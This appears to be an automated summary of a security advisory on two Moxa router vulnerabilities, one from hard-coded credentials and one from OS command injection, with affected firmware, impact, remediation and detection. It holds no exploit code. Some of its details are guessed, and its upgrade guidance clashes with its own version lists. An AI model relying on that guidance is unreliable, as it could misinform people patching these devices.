Full Report
Taiwan-based Moxa has warned of two security vulnerabilities impacting its cellular routers, secure routers, and network security appliances that could allow privilege escalation and command execution. The list of vulnerabilities is as follows - CVE-2024-9138 (CVSS 4.0 score: 8.6) - A hard-coded credentials vulnerability that could allow an authenticated user to escalate privileges and gain
Analysis Summary
# Vulnerability: Moxa Cellular and Secure Routers Vulnerabilities Leading to Privilege Escalation and Command Injection
## CVE Details
- CVE ID: CVE-2024-9138
- CVSS Score: 8.6 (High)
- CWE: Hard-coded Credentials
- CVE ID: CVE-2024-9140
- CVSS Score: 9.3 (Critical)
- CWE: Input Restriction Bypass (implied command injection via special characters)
## Affected Systems
- Products: Moxa EDR-810 Series, EDR-8010 Series, EDR-G902 Series, EDR-G903 Series, EDR-G9004 Series, EDR-G9010 Series, EDF-G1002-BP Series, NAT-102 Series, OnCell G4302-LTE4 Series, TN-4900 Series.
- Versions:
- **CVE-2024-9138:** Firmware version 5.12.37 and earlier (EDR-810), 3.13.1 and earlier (EDR-8010, EDR-G9004, EDR-G9010, EDF-G1002-BP, TN-4900), 5.7.25 and earlier (EDR-G902), 3.13 and earlier (OnCell G4302-LTE4).
- **CVE-2024-9140:** Firmware version 3.13.1 and earlier (EDR-8010, EDR-G9004, EDR-G9010, EDF-G1002-BP), 1.0.5 and earlier (NAT-102), 3.13 and earlier (OnCell G4302-LTE4, TN-4900).
- Configurations: The specific impact level or configuration requirements (e.g., authentication) are partially detailed by the vulnerability type. CVE-2024-9138 requires an authenticated user.
## Vulnerability Description
**CVE-2024-9138 (Hard-Coded Credentials):** This flaw involves hard-coded credentials within the affected firmware. An authenticated attacker can exploit this to escalate privileges to root-level access, leading to system compromise, unauthorized changes, data exposure, or service disruption.
**CVE-2024-9140 (OS Command Injection):** This vulnerability allows attackers to exploit special characters within input fields to bypass existing input restrictions. Successful exploitation leads to unauthorized remote execution of operating system commands.
## Exploitation
- Status: Not explicitly stated as exploited in the wild, but the severity and researcher report suggest active threat potential.
- Complexity: **CVE-2024-9138** requires authentication, suggesting Medium complexity. **CVE-2024-9140** appears simpler if input sanitization is weak.
- Attack Vector: Likely **Network** for CVE-2024-9140 (command injection) and possibly **Adjacent** or **Local** for CVE-2024-9138 (privilege escalation after authentication).
## Impact
- Confidentiality: High (Root access allows data exposure/theft)
- Integrity: High (Configuration modification, command execution)
- Availability: High (Service disruption possible through command execution)
## Remediation
### Patches
Users must upgrade firmware to the specified versions:
- All listed affected series (EDR-810, EDR-8010, EDR-G902, EDR-G903, EDR-G9004, EDR-G9010, EDF-G1002-BP, NAT-102, OnCell G4302-LTE4, TN-4900): **Upgrade to firmware version 3.14 or later** (where applicable, specific minimum versions are listed for different product lines in the advisory).
### Workarounds
No specific workarounds were detailed in the provided summary, implying immediate patching is the primary recommendation. Mitigation likely involves strict network segmentation and limiting administrative access.
## Detection
- Indicators of compromise: Unauthorized privilege gain, unusual commands executed on the device, or unexpected system configuration changes.
- Detection methods and tools: IPS/IDS monitoring network traffic for anomalous input strings containing special characters targeting Moxa management interfaces. Auditing system logs for unexpected root access attempts or privilege escalations.
## References
- Vendor Advisories: moxa dot com/en/support/product-support/security-advisory/mpsa-241155-privilege-escalation-and-os-command-injection-vulnerabilities-in-cellular-routers,-secure-routers,-and-netwo
- Relevant links - defanged: https://www.moxa.com/en/support/product-support/security-advisory/mpsa-241155-privilege-escalation-and-os-command-injection-vulnerabilities-in-cellular-routers,-secure-routers,-and-netwo